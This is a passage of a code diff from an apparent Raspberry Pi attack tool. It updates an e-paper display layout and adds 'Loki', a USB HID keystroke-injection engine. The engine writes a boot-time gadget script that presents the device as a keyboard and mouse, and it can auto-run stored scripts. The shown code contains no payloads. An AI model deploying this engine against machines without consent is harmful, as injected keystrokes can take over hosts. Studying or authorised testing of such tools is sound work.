# Frame Line at y=170. Gap 1px -> Start y=172. Left Gap 1px -> Start x=2.
@@ -782,13 +803,11 @@ class Display:
draw.text(text_pos, text, font=self.shared_data.font_arial9, fill=0)
# Draw LVL Box manually to ensure perfect positioning
# Box: x=2, y=172.
# User requested "LVL" above value -> Rectangle.
# Height increased to fit both (approx 26px).
lvl_x = self.px(2)
lvl_y = self.py(172)
lvl_w = self.px(18)
lvl_h = self.py(26)
lvl = self.layout.get('lvl_box')
lvl_x = self.px(lvl.get('x', 2))
lvl_y = self.py(lvl.get('y', 172))
lvl_w = self.px(lvl.get('w', 18))
lvl_h = self.py(lvl.get('h', 26))
draw.rectangle([lvl_x, lvl_y, lvl_x + lvl_w, lvl_y + lvl_h], outline=0)
@@ -813,17 +832,14 @@ class Display:
draw.text((v_x, v_y), lvl_val, font=val_font, fill=0)
# --- Right Side Widgets (Integrated with Frame) ---
# Existing Frame: Top line at y=170. Right edge at x=121. Bottom at y=249.
# We only need to draw the Left Vertical separator and Internal Horizontal separators.
nkb = self.layout.get('network_kb')
line_bottom = self.layout.get('line_bottom_section')
# Column: x=101 to x=121 (Width 20px).
# Height: y=170 to y=249 (Total 79px).
col_x_start = self.px(nkb.get('x', 101))
col_x_end = self.px(nkb.get('x', 101) + nkb.get('w', 20))
col_w = self.px(nkb.get('w', 20))
col_x_start = self.px(101)
col_x_end = self.px(121) # Implicit right edge, useful for centering
col_w = self.px(20)
y_top = self.py(170)
y_top = self.py(line_bottom.get('y', 170))
y_bottom = self.py(249)
# 1. Draw Left Vertical Divider
@@ -926,11 +942,18 @@ class Display:
except:
progress_val = 0
# Draw Progress Bar (y=75-80) - Moved up & narrower to fit text
bar_x = self.px(35)
bar_y = self.py(75)
bar_w = self.px(55) # Reduced to 55px to fit text "100%"
bar_h = self.py(5)
# Layout lookups for status area
pbar = self.layout.get('progress_bar')
ip_pos = self.layout.get('ip_text')
sl1 = self.layout.get('status_line1')
sl2 = self.layout.get('status_line2')
line_comment = self.layout.get('line_comment_top')
# Draw Progress Bar
bar_x = self.px(pbar.get('x', 35))
bar_y = self.py(pbar.get('y', 75))
bar_w = self.px(pbar.get('w', 55))
bar_h = self.py(pbar.get('h', 5))
if progress_val > 0:
# Standard Progress Bar
@@ -940,9 +963,6 @@ class Display:
draw.rectangle([bar_x, bar_y, bar_x + fill_w, bar_y + bar_h], fill=0)
# Draw Percentage Text at the end
# x = bar_x + bar_w + 3
# y = centered with bar (bar y=75, h=5 -> center 77.5)
# Font 9 height ~9-10px. y_text ~ 73 ?
text_x = bar_x + bar_w + self.px(4)
text_y = bar_y - 2 # Align visually with bar
draw.text((text_x, text_y), f"{progress_val}%", font=self.shared_data.font_arial9, fill=0)
@@ -951,6 +971,7 @@ class Display:
action_target_ip = str(getattr(self.shared_data, "action_target_ip", "") or "").strip()
orch_status = str(getattr(self.shared_data, "bjorn_orch_status", "IDLE") or "IDLE").upper()
show_ip = bool(getattr(self.shared_data, "showiponscreen", False))
comment_line_y = self.py(line_comment.get('y', 85))
if show_ip:
# Show local IP only while idle; during actions show target IP when available.
if orch_status == "IDLE":
@@ -958,21 +979,24 @@ class Display:
else:
ip_to_show = action_target_ip or current_ip
draw.text((self.px(35), self.py(52)), ip_to_show,
draw.text((self.px(ip_pos.get('x', 35)), self.py(ip_pos.get('y', 52))), ip_to_show,
font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(35), self.py(61)), self.shared_data.bjorn_status_text,
draw.text((self.px(sl1.get('x', 35)), self.py(sl1.get('y', 55) + 6)), self.shared_data.bjorn_status_text,
font=self.shared_data.font_arial9, fill=0)
# Line at y=85 (moved up 3px)
draw.line((1, self.py(85), self.shared_data.width - 1, self.py(85)), fill=0)
draw.line((1, comment_line_y, self.shared_data.width - 1, comment_line_y), fill=0)
else:
draw.text((self.px(35), self.py(55)), self.shared_data.bjorn_status_text,
draw.text((self.px(sl1.get('x', 35)), self.py(sl1.get('y', 55))), self.shared_data.bjorn_status_text,
font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(35), self.py(66)), self.shared_data.bjorn_status_text2,
draw.text((self.px(sl2.get('x', 35)), self.py(sl2.get('y', 66))), self.shared_data.bjorn_status_text2,
font=self.shared_data.font_arial9, fill=0)
# Line at y=85 (moved up 3px)
draw.line((1, self.py(85), self.shared_data.width - 1, self.py(85)), fill=0)
draw.line((1, comment_line_y, self.shared_data.width - 1, comment_line_y), fill=0)
def _draw_decorations(self, image: Image.Image, draw: ImageDraw.Draw):
line_top = self.layout.get('line_top_bar')
line_mid = self.layout.get('line_mid_section')
line_bottom = self.layout.get('line_bottom_section')
frise_elem = self.layout.get('frise')
show_ssid = bool(getattr(self.shared_data, "showssidonscreen", False))
if show_ssid:
# Center SSID
@@ -981,17 +1005,18 @@ class Display:
center_x = self.shared_data.width // 2
ssid_x = int(center_x - (ssid_w / 2))
draw.text((ssid_x, self.py(160)), ssid,
frise_y_val = frise_elem.get('y', 160) if frise_elem else 160
draw.text((ssid_x, self.py(frise_y_val)), ssid,
font=self.shared_data.font_arial9, fill=0)
draw.line((0, self.py(170), self.shared_data.width, self.py(170)), fill=0)
draw.line((0, self.py(line_bottom.get('y', 170)), self.shared_data.width, self.py(line_bottom.get('y', 170))), fill=0)
else:
frise_x, frise_y = self.get_frise_position()
if self.shared_data.frise is not None:
image.paste(self.shared_data.frise, (frise_x, frise_y))
draw.rectangle((0, 0, self.shared_data.width - 1, self.shared_data.height - 1), outline=0)
draw.line((0, self.py(20), self.shared_data.width, self.py(20)), fill=0)
draw.line((0, self.py(51), self.shared_data.width, self.py(51)), fill=0)
draw.line((0, self.py(line_top.get('y', 20)), self.shared_data.width, self.py(line_top.get('y', 20))), fill=0)
draw.line((0, self.py(line_mid.get('y', 51)), self.shared_data.width, self.py(line_mid.get('y', 51))), fill=0)
def _draw_comment_text(self, draw: ImageDraw.Draw):
# Cache key for the layout
@@ -1011,9 +1036,8 @@ class Display:
else:
lines = self._comment_layout_cache["lines"]
# MODIFICATION ICI :
# La ligne du dessus est à self.py(85). On veut 1px d'écart, donc 85 + 1 = 86.
y_text = self.py(86)
comment = self.layout.get('comment_area')
y_text = self.py(comment.get('y', 86))
font = self.shared_data.font_arialbold
bbox = font.getbbox('Aj')

199
display_layout.py Normal file
View File

@@ -0,0 +1,199 @@
"""
Display Layout Engine for multi-size EPD support.
Provides data-driven layout definitions per display model.
"""
import json
import os
import logging
from logger import Logger
logger = Logger(name="display_layout.py", level=logging.DEBUG)
# Default layout for 122x250 (epd2in13 reference)
DEFAULT_LAYOUT = {
"meta": {
"name": "epd2in13_default",
"ref_width": 122,
"ref_height": 250,
"description": "Default layout for 2.13 inch e-paper display"
},
"elements": {
"title": {"x": 37, "y": 5, "w": 80, "h": 14},
"wifi_icon": {"x": 3, "y": 3, "w": 12, "h": 12},
"bt_icon": {"x": 18, "y": 3, "w": 12, "h": 12},
"usb_icon": {"x": 33, "y": 4, "w": 12, "h": 12},
"eth_icon": {"x": 48, "y": 4, "w": 12, "h": 12},
"battery_icon": {"x": 110, "y": 3, "w": 12, "h": 12},
"stats_row": {"x": 2, "y": 22, "w": 118, "h": 16},
"status_image": {"x": 3, "y": 52, "w": 15, "h": 15},
"progress_bar": {"x": 35, "y": 75, "w": 55, "h": 5},
"ip_text": {"x": 35, "y": 52, "w": 85, "h": 10},
"status_line1": {"x": 35, "y": 55, "w": 85, "h": 10},
"status_line2": {"x": 35, "y": 66, "w": 85, "h": 10},
"comment_area": {"x": 1, "y": 86, "w": 120, "h": 73},
"main_character": {"x": 25, "y": 100, "w": 70, "h": 65},
"lvl_box": {"x": 2, "y": 172, "w": 18, "h": 26},
"cpu_histogram": {"x": 2, "y": 204, "w": 8, "h": 33},
"mem_histogram": {"x": 12, "y": 204, "w": 8, "h": 33},
"network_kb": {"x": 101, "y": 170, "w": 20, "h": 26},
"attacks_count": {"x": 101, "y": 200, "w": 20, "h": 26},
"frise": {"x": 0, "y": 160, "w": 122, "h": 10},
"line_top_bar": {"y": 20},
"line_mid_section": {"y": 51},
"line_comment_top": {"y": 85},
"line_bottom_section": {"y": 170}
},
"fonts": {
"title_size": 11,
"stats_size": 8,
"status_size": 8,
"comment_size": 8,
"lvl_size": 10
}
}
# Layout for 176x264 (epd2in7)
LAYOUT_EPD2IN7 = {
"meta": {
"name": "epd2in7_default",
"ref_width": 176,
"ref_height": 264,
"description": "Default layout for 2.7 inch e-paper display"
},
"elements": {
"title": {"x": 50, "y": 5, "w": 120, "h": 16},
"wifi_icon": {"x": 4, "y": 3, "w": 14, "h": 14},
"bt_icon": {"x": 22, "y": 3, "w": 14, "h": 14},
"usb_icon": {"x": 40, "y": 4, "w": 14, "h": 14},
"eth_icon": {"x": 58, "y": 4, "w": 14, "h": 14},
"battery_icon": {"x": 158, "y": 3, "w": 14, "h": 14},
"stats_row": {"x": 2, "y": 24, "w": 172, "h": 18},
"status_image": {"x": 4, "y": 55, "w": 18, "h": 18},
"progress_bar": {"x": 45, "y": 80, "w": 80, "h": 6},
"ip_text": {"x": 45, "y": 55, "w": 125, "h": 12},
"status_line1": {"x": 45, "y": 58, "w": 125, "h": 12},
"status_line2": {"x": 45, "y": 72, "w": 125, "h": 12},
"comment_area": {"x": 2, "y": 92, "w": 172, "h": 78},
"main_character": {"x": 35, "y": 105, "w": 100, "h": 70},
"lvl_box": {"x": 2, "y": 178, "w": 22, "h": 30},
"cpu_histogram": {"x": 2, "y": 215, "w": 10, "h": 38},
"mem_histogram": {"x": 14, "y": 215, "w": 10, "h": 38},
"network_kb": {"x": 148, "y": 178, "w": 26, "h": 30},
"attacks_count": {"x": 148, "y": 215, "w": 26, "h": 30},
"frise": {"x": 50, "y": 170, "w": 90, "h": 10},
"line_top_bar": {"y": 22},
"line_mid_section": {"y": 53},
"line_comment_top": {"y": 90},
"line_bottom_section": {"y": 176}
},
"fonts": {
"title_size": 13,
"stats_size": 9,
"status_size": 9,
"comment_size": 9,
"lvl_size": 12
}
}
# Registry of built-in layouts
BUILTIN_LAYOUTS = {
"epd2in13": DEFAULT_LAYOUT,
"epd2in13_V2": DEFAULT_LAYOUT,
"epd2in13_V3": DEFAULT_LAYOUT,
"epd2in13_V4": DEFAULT_LAYOUT,
"epd2in7": LAYOUT_EPD2IN7,
}
class DisplayLayout:
"""Manages display layout definitions with per-element positioning."""
def __init__(self, shared_data):
self.shared_data = shared_data
self._layout = None
self._custom_dir = os.path.join(
getattr(shared_data, 'current_dir', '.'),
'resources', 'layouts'
)
self.load()
def load(self):
"""Load layout for current EPD type. Custom file overrides built-in."""
epd_type = getattr(self.shared_data, 'epd_type',
self.shared_data.config.get('epd_type', 'epd2in13_V4')
if hasattr(self.shared_data, 'config') else 'epd2in13_V4')
# Try custom layout file first
custom_path = os.path.join(self._custom_dir, f'{epd_type}.json')
if os.path.isfile(custom_path):
try:
with open(custom_path, 'r') as f:
self._layout = json.load(f)
logger.info(f"Loaded custom layout from {custom_path}")
return
except Exception as e:
logger.error(f"Failed to load custom layout {custom_path}: {e}")
# Fallback to built-in
base = epd_type.split('_')[0] if '_' in epd_type else epd_type
self._layout = BUILTIN_LAYOUTS.get(epd_type) or BUILTIN_LAYOUTS.get(base) or DEFAULT_LAYOUT
logger.info(f"Using built-in layout for {epd_type}: {self._layout['meta']['name']}")
def get(self, element_name, prop=None):
"""Get element position dict or specific property.
Returns: dict {x, y, w, h} or int value if prop specified.
Falls back to (0,0) if element not found.
"""
elem = self._layout.get('elements', {}).get(element_name, {})
if prop:
return elem.get(prop, 0)
return elem
def font_size(self, name):
"""Get font size by name."""
return self._layout.get('fonts', {}).get(name, 8)
def meta(self):
"""Get layout metadata."""
return self._layout.get('meta', {})
def ref_size(self):
"""Get reference dimensions (width, height)."""
m = self.meta()
return m.get('ref_width', 122), m.get('ref_height', 250)
def all_elements(self):
"""Return all element definitions."""
return dict(self._layout.get('elements', {}))
def save_custom(self, layout_dict, epd_type=None):
"""Save a custom layout to disk."""
if epd_type is None:
epd_type = getattr(self.shared_data, 'epd_type',
self.shared_data.config.get('epd_type', 'epd2in13_V4')
if hasattr(self.shared_data, 'config') else 'epd2in13_V4')
os.makedirs(self._custom_dir, exist_ok=True)
path = os.path.join(self._custom_dir, f'{epd_type}.json')
tmp = path + '.tmp'
with open(tmp, 'w') as f:
json.dump(layout_dict, f, indent=2)
os.replace(tmp, path)
self._layout = layout_dict
logger.info(f"Saved custom layout to {path}")
def reset_to_default(self, epd_type=None):
"""Delete custom layout, revert to built-in."""
if epd_type is None:
epd_type = getattr(self.shared_data, 'epd_type',
self.shared_data.config.get('epd_type', 'epd2in13_V4')
if hasattr(self.shared_data, 'config') else 'epd2in13_V4')
custom_path = os.path.join(self._custom_dir, f'{epd_type}.json')
if os.path.isfile(custom_path):
os.remove(custom_path)
logger.info(f"Removed custom layout {custom_path}")
self.load()
def to_dict(self):
"""Export current layout as dict (for API)."""
return dict(self._layout) if self._layout else {}

View File

@@ -737,6 +737,68 @@ class FeatureLogger:
# FEATURE AGGREGATION & EXPORT
# ═══════════════════════════════════════════════════════════════════════
def get_feature_importance(self) -> List[Dict[str, Any]]:
"""
AI-01: Return features sorted by variance from the ml_features_aggregated table.
Features with higher variance carry more discriminative information.
Returns:
List of dicts: [{name, variance, sample_count}, ...] sorted by variance descending.
"""
min_variance = float(
getattr(self.shared_data, 'ai_feature_selection_min_variance', 0.001)
)
results = []
try:
rows = self.db.query(
"SELECT feature_vector, total_actions FROM ml_features_aggregated"
)
if not rows:
return results
# Accumulate per-feature running stats (Welford-style via sum/sq/n)
stats = {} # {feature_name: [sum, sum_sq, count]}
for row in rows:
try:
vec = json.loads(row.get('feature_vector', '{}'))
except Exception:
continue
if not isinstance(vec, dict):
continue
for name, value in vec.items():
try:
val = float(value)
except (TypeError, ValueError):
continue
if name not in stats:
stats[name] = [0.0, 0.0, 0]
s = stats[name]
s[0] += val
s[1] += val * val
s[2] += 1
for name, (s, sq, n) in stats.items():
if n < 2:
variance = 0.0
else:
mean = s / n
variance = max(0.0, sq / n - mean * mean)
results.append({
'name': name,
'variance': round(variance, 6),
'sample_count': n,
'above_threshold': variance >= min_variance,
})
results.sort(key=lambda x: x['variance'], reverse=True)
logger.debug(f"Feature importance: {len(results)} features analyzed, "
f"{sum(1 for r in results if r['above_threshold'])} above threshold")
except Exception as e:
logger.error(f"Error computing feature importance: {e}")
return results
def get_stats(self) -> Dict[str, Any]:
"""Get current feature logging statistics"""
try:

375
loki/__init__.py Normal file
View File

@@ -0,0 +1,375 @@
"""
Loki — HID Attack Engine for Bjorn.
Manages USB HID gadget lifecycle, script execution, and job tracking.
Named after the Norse trickster god.
Loki is the 5th exclusive operation mode (alongside MANUAL, AUTO, AI, BIFROST).
When active, the orchestrator stops and the Pi acts as a keyboard/mouse
to the connected host via /dev/hidg0 (keyboard) and /dev/hidg1 (mouse).
HID GADGET STRATEGY:
The HID functions (keyboard + mouse) are created ONCE at boot time alongside
RNDIS networking by the usb-gadget.sh script. This avoids the impossible task
of hot-adding HID functions to a running composite gadget (UDC rebind fails
with EIO when RNDIS is active).
LokiEngine simply opens/closes the /dev/hidg0 and /dev/hidg1 device files.
If /dev/hidg0 doesn't exist, the user needs to run the setup once and reboot.
"""
import os
import time
import subprocess
import logging
from threading import Event
from logger import Logger
logger = Logger(name="loki", level=logging.DEBUG)
# USB HID report descriptors — EXACT byte-for-byte copies from P4wnP1_aloa
# Source: P4wnP1_aloa-master/service/SubSysUSB.go lines 54-70
#
# These are written to the gadget at boot time by usb-gadget.sh.
# Kept here for reference and for the install_hid_gadget() method.
#
_KBD_REPORT_DESC = bytes([
0x05, 0x01, 0x09, 0x06, 0xa1, 0x01, 0x05, 0x07,
0x19, 0xe0, 0x29, 0xe7, 0x15, 0x00, 0x25, 0x01,
0x75, 0x01, 0x95, 0x08, 0x81, 0x02, 0x95, 0x01,
0x75, 0x08, 0x81, 0x03, 0x95, 0x05, 0x75, 0x01,
0x05, 0x08, 0x19, 0x01, 0x29, 0x05, 0x91, 0x02,
0x95, 0x01, 0x75, 0x03, 0x91, 0x03, 0x95, 0x06,
0x75, 0x08, 0x15, 0x00, 0x25, 0x65, 0x05, 0x07,
0x19, 0x00, 0x29, 0x65, 0x81, 0x00, 0xc0,
]) # 63 bytes, report_length=8
_MOUSE_REPORT_DESC = bytes([
0x05, 0x01, 0x09, 0x02, 0xa1, 0x01, 0x09, 0x01,
0xa1, 0x00, 0x85, 0x01, 0x05, 0x09, 0x19, 0x01,
0x29, 0x03, 0x15, 0x00, 0x25, 0x01, 0x95, 0x03,
0x75, 0x01, 0x81, 0x02, 0x95, 0x01, 0x75, 0x05,
0x81, 0x03, 0x05, 0x01, 0x09, 0x30, 0x09, 0x31,
0x15, 0x81, 0x25, 0x7f, 0x75, 0x08, 0x95, 0x02,
0x81, 0x06, 0x95, 0x02, 0x75, 0x08, 0x81, 0x01,
0xc0, 0xc0, 0x05, 0x01, 0x09, 0x02, 0xa1, 0x01,
0x09, 0x01, 0xa1, 0x00, 0x85, 0x02, 0x05, 0x09,
0x19, 0x01, 0x29, 0x03, 0x15, 0x00, 0x25, 0x01,
0x95, 0x03, 0x75, 0x01, 0x81, 0x02, 0x95, 0x01,
0x75, 0x05, 0x81, 0x01, 0x05, 0x01, 0x09, 0x30,
0x09, 0x31, 0x15, 0x00, 0x26, 0xff, 0x7f, 0x95,
0x02, 0x75, 0x10, 0x81, 0x02, 0xc0, 0xc0,
]) # 111 bytes, report_length=6
# The boot script that creates RNDIS + HID functions at startup.
# This replaces /usr/local/bin/usb-gadget.sh
_USB_GADGET_SCRIPT = '''#!/bin/bash
# usb-gadget.sh — USB composite gadget: RNDIS networking + HID (keyboard/mouse)
# Auto-generated by Bjorn Loki. Do not edit manually.
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS + HID" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
# ── RNDIS networking function ──
mkdir -p functions/rndis.usb0
[ -L configs/c.1/rndis.usb0 ] && rm configs/c.1/rndis.usb0
ln -s functions/rndis.usb0 configs/c.1/
# ── HID functions (keyboard + mouse) ──
# Use python3 to write binary report descriptors (bash printf can't handle null bytes)
python3 - <<'PYEOF'
import os, sys
G = "/sys/kernel/config/usb_gadget/g1"
# Keyboard: P4wnP1 exact boot keyboard descriptor (63 bytes)
KBD_DESC = bytes([
0x05,0x01,0x09,0x06,0xa1,0x01,0x05,0x07,
0x19,0xe0,0x29,0xe7,0x15,0x00,0x25,0x01,
0x75,0x01,0x95,0x08,0x81,0x02,0x95,0x01,
0x75,0x08,0x81,0x03,0x95,0x05,0x75,0x01,
0x05,0x08,0x19,0x01,0x29,0x05,0x91,0x02,
0x95,0x01,0x75,0x03,0x91,0x03,0x95,0x06,
0x75,0x08,0x15,0x00,0x25,0x65,0x05,0x07,
0x19,0x00,0x29,0x65,0x81,0x00,0xc0,
])
# Mouse: P4wnP1 dual-mode (relative + absolute) descriptor (111 bytes)
MOUSE_DESC = bytes([
0x05,0x01,0x09,0x02,0xa1,0x01,0x09,0x01,
0xa1,0x00,0x85,0x01,0x05,0x09,0x19,0x01,
0x29,0x03,0x15,0x00,0x25,0x01,0x95,0x03,
0x75,0x01,0x81,0x02,0x95,0x01,0x75,0x05,
0x81,0x03,0x05,0x01,0x09,0x30,0x09,0x31,
0x15,0x81,0x25,0x7f,0x75,0x08,0x95,0x02,
0x81,0x06,0x95,0x02,0x75,0x08,0x81,0x01,
0xc0,0xc0,0x05,0x01,0x09,0x02,0xa1,0x01,
0x09,0x01,0xa1,0x00,0x85,0x02,0x05,0x09,
0x19,0x01,0x29,0x03,0x15,0x00,0x25,0x01,
0x95,0x03,0x75,0x01,0x81,0x02,0x95,0x01,
0x75,0x05,0x81,0x01,0x05,0x01,0x09,0x30,
0x09,0x31,0x15,0x00,0x26,0xff,0x7f,0x95,
0x02,0x75,0x10,0x81,0x02,0xc0,0xc0,
])
def w(path, content):
with open(path, "w") as f:
f.write(content)
def wb(path, data):
with open(path, "wb") as f:
f.write(data)
try:
# Keyboard (hid.usb0)
kbd = G + "/functions/hid.usb0"
os.makedirs(kbd, exist_ok=True)
w(kbd + "/protocol", "1")
w(kbd + "/subclass", "1")
w(kbd + "/report_length", "8")
wb(kbd + "/report_desc", KBD_DESC)
# Mouse (hid.usb1)
mouse = G + "/functions/hid.usb1"
os.makedirs(mouse, exist_ok=True)
w(mouse + "/protocol", "2")
w(mouse + "/subclass", "1")
w(mouse + "/report_length", "6")
wb(mouse + "/report_desc", MOUSE_DESC)
print(f"HID functions created: keyboard ({len(KBD_DESC)}B) + mouse ({len(MOUSE_DESC)}B)")
except Exception as e:
print(f"WARNING: HID setup failed (non-fatal): {e}", file=sys.stderr)
sys.exit(0) # Don't block RNDIS setup
PYEOF
# Symlink HID into config (non-fatal)
for func in hid.usb0 hid.usb1; do
[ -L "configs/c.1/$func" ] && rm "configs/c.1/$func"
if [ -d "functions/$func" ]; then
ln -s "functions/$func" "configs/c.1/" 2>/dev/null || true
fi
done
# ── Bind UDC ──
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
UDC_NAME=$(ls /sys/class/udc)
echo "$UDC_NAME" > UDC
echo "Assigned UDC: $UDC_NAME (RNDIS + HID keyboard + HID mouse)"
# ── Configure network ──
if ! ip addr show usb0 2>/dev/null | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0 2>/dev/null || true
echo "Configured usb0 with IP 172.20.2.1"
else
echo "Interface usb0 already configured."
fi
'''
_GADGET_SCRIPT_PATH = "/usr/local/bin/usb-gadget.sh"
class LokiEngine:
"""HID attack engine — manages script execution and job tracking.
The USB HID gadget (keyboard + mouse) is set up at boot time by
usb-gadget.sh. This engine simply opens /dev/hidg0 and /dev/hidg1.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self._stop_event = Event()
self._running = False
self._gadget_ready = False
# Sub-components (lazy init)
self._hid = None
self._jobs = None
# ── Properties ─────────────────────────────────────────────
@property
def hid_controller(self):
if self._hid is None:
from loki.hid_controller import HIDController
self._hid = HIDController()
return self._hid
@property
def job_manager(self):
if self._jobs is None:
from loki.jobs import LokiJobManager
self._jobs = LokiJobManager(self)
return self._jobs
# ── Start / Stop ───────────────────────────────────────────
def start(self):
"""Start Loki engine: open HID devices, apply config."""
if self._running:
logger.warning("Loki already running")
return
logger.info("Starting Loki engine...")
self._stop_event.clear()
# Check if HID gadget is available (set up at boot)
if not os.path.exists("/dev/hidg0"):
logger.error(
"/dev/hidg0 not found — HID gadget not configured at boot. "
"Run install_hid_gadget() from the Loki API and reboot."
)
self._gadget_ready = False
return
self._gadget_ready = True
# Open HID devices
try:
self.hid_controller.open()
except Exception as e:
logger.error("HID device open failed: %s", e)
self._gadget_ready = False
return
# Apply config
layout = self.shared_data.config.get("loki_default_layout", "us")
self.hid_controller.set_layout(layout)
speed_min = self.shared_data.config.get("loki_typing_speed_min", 0)
speed_max = self.shared_data.config.get("loki_typing_speed_max", 0)
self.hid_controller.set_typing_speed(speed_min, speed_max)
self._running = True
logger.info("Loki engine started (HID devices open)")
# Auto-run script if configured
auto_run = self.shared_data.config.get("loki_auto_run", "")
if auto_run:
self._auto_run_script(auto_run)
def stop(self):
"""Stop Loki engine: cancel jobs, close devices."""
if not self._running:
return
logger.info("Stopping Loki engine...")
self._stop_event.set()
# Cancel all running jobs
if self._jobs:
for job in self._jobs.get_all_jobs():
if job["status"] == "running":
self._jobs.cancel_job(job["id"])
# Close HID devices (don't remove gadget — it persists)
if self._hid:
self._hid.close()
self._running = False
self._gadget_ready = False
logger.info("Loki engine stopped")
def get_status(self) -> dict:
"""Return current engine status for the API."""
hidg0_exists = os.path.exists("/dev/hidg0")
return {
"enabled": self.shared_data.config.get("loki_enabled", False),
"running": self._running,
"gadget_ready": self._gadget_ready,
"gadget_installed": hidg0_exists,
"layout": self.shared_data.config.get("loki_default_layout", "us"),
"jobs_running": self.job_manager.running_count if self._jobs else 0,
"jobs_total": len(self._jobs.get_all_jobs()) if self._jobs else 0,
}
# ── Job API (delegated to JobManager) ──────────────────────
def submit_job(self, script_name: str, script_content: str) -> str:
"""Submit a HIDScript for execution. Returns job_id."""
if not self._running:
raise RuntimeError("Loki engine not running")
if not self._gadget_ready:
raise RuntimeError("HID gadget not ready")
return self.job_manager.create_job(script_name, script_content)
def cancel_job(self, job_id: str) -> bool:
return self.job_manager.cancel_job(job_id)
def get_jobs(self) -> list:
return self.job_manager.get_all_jobs()
# ── HID Gadget Installation ────────────────────────────────
@staticmethod
def is_gadget_installed() -> bool:
"""Check if the HID gadget is available."""
return os.path.exists("/dev/hidg0")
@staticmethod
def install_hid_gadget() -> dict:
"""Install/update the USB gadget boot script to include HID functions.
Writes the new usb-gadget.sh that creates RNDIS + HID at boot.
Returns status dict. Requires a reboot to take effect.
"""
try:
# Write the new gadget script
with open(_GADGET_SCRIPT_PATH, "w") as f:
f.write(_USB_GADGET_SCRIPT)
os.chmod(_GADGET_SCRIPT_PATH, 0o755)
logger.info("USB gadget script updated at %s", _GADGET_SCRIPT_PATH)
return {
"success": True,
"message": "USB gadget script updated with HID support. Reboot required.",
"reboot_required": True,
}
except Exception as e:
logger.error("Failed to install HID gadget script: %s", e)
return {
"success": False,
"message": f"Installation failed: {e}",
"reboot_required": False,
}
# ── Auto-run ───────────────────────────────────────────────
def _auto_run_script(self, script_name: str):
"""Auto-run a script by name from the database."""
try:
db = self.shared_data.db
row = db.query_one(
"SELECT content FROM loki_scripts WHERE name = ?", (script_name,)
)
if row and row.get("content"):
self.submit_job(script_name, row["content"])
logger.info("Auto-running script: %s", script_name)
except Exception as e:
logger.error("Auto-run failed for '%s': %s", script_name, e)

408
loki/hid_controller.py Normal file
View File

@@ -0,0 +1,408 @@
"""
Low-level USB HID controller for Loki.
Writes keyboard and mouse reports to /dev/hidg0 and /dev/hidg1.
"""
import os
import struct
import time
import random
import logging
import select
from threading import Event
from logger import Logger
from loki.layouts import load as load_layout
logger = Logger(name="loki.hid_controller", level=logging.DEBUG)
# ── HID Keycodes ──────────────────────────────────────────────
# USB HID Usage Tables — Keyboard/Keypad Page (0x07)
KEY_NONE = 0x00
KEY_A = 0x04
KEY_B = 0x05
KEY_C = 0x06
KEY_D = 0x07
KEY_E = 0x08
KEY_F = 0x09
KEY_G = 0x0A
KEY_H = 0x0B
KEY_I = 0x0C
KEY_J = 0x0D
KEY_K = 0x0E
KEY_L = 0x0F
KEY_M = 0x10
KEY_N = 0x11
KEY_O = 0x12
KEY_P = 0x13
KEY_Q = 0x14
KEY_R = 0x15
KEY_S = 0x16
KEY_T = 0x17
KEY_U = 0x18
KEY_V = 0x19
KEY_W = 0x1A
KEY_X = 0x1B
KEY_Y = 0x1C
KEY_Z = 0x1D
KEY_1 = 0x1E
KEY_2 = 0x1F
KEY_3 = 0x20
KEY_4 = 0x21
KEY_5 = 0x22
KEY_6 = 0x23
KEY_7 = 0x24
KEY_8 = 0x25
KEY_9 = 0x26
KEY_0 = 0x27
KEY_ENTER = 0x28
KEY_ESC = 0x29
KEY_BACKSPACE = 0x2A
KEY_TAB = 0x2B
KEY_SPACE = 0x2C
KEY_MINUS = 0x2D
KEY_EQUAL = 0x2E
KEY_LEFTBRACE = 0x2F
KEY_RIGHTBRACE = 0x30
KEY_BACKSLASH = 0x31
KEY_SEMICOLON = 0x33
KEY_APOSTROPHE = 0x34
KEY_GRAVE = 0x35
KEY_COMMA = 0x36
KEY_DOT = 0x37
KEY_SLASH = 0x38
KEY_CAPSLOCK = 0x39
KEY_F1 = 0x3A
KEY_F2 = 0x3B
KEY_F3 = 0x3C
KEY_F4 = 0x3D
KEY_F5 = 0x3E
KEY_F6 = 0x3F
KEY_F7 = 0x40
KEY_F8 = 0x41
KEY_F9 = 0x42
KEY_F10 = 0x43
KEY_F11 = 0x44
KEY_F12 = 0x45
KEY_PRINTSCREEN = 0x46
KEY_SCROLLLOCK = 0x47
KEY_PAUSE = 0x48
KEY_INSERT = 0x49
KEY_HOME = 0x4A
KEY_PAGEUP = 0x4B
KEY_DELETE = 0x4C
KEY_END = 0x4D
KEY_PAGEDOWN = 0x4E
KEY_RIGHT = 0x4F
KEY_LEFT = 0x50
KEY_DOWN = 0x51
KEY_UP = 0x52
KEY_NUMLOCK = 0x53
# ── Modifier bitmasks ─────────────────────────────────────────
MOD_NONE = 0x00
MOD_LEFT_CONTROL = 0x01
MOD_LEFT_SHIFT = 0x02
MOD_LEFT_ALT = 0x04
MOD_LEFT_GUI = 0x08
MOD_RIGHT_CONTROL = 0x10
MOD_RIGHT_SHIFT = 0x20
MOD_RIGHT_ALT = 0x40
MOD_RIGHT_GUI = 0x80
# ── Combo name → (modifier_mask, keycode) ─────────────────────
_COMBO_MAP = {
# Modifiers (used standalone or in combos)
"CTRL": (MOD_LEFT_CONTROL, KEY_NONE),
"CONTROL": (MOD_LEFT_CONTROL, KEY_NONE),
"SHIFT": (MOD_LEFT_SHIFT, KEY_NONE),
"ALT": (MOD_LEFT_ALT, KEY_NONE),
"GUI": (MOD_LEFT_GUI, KEY_NONE),
"WIN": (MOD_LEFT_GUI, KEY_NONE),
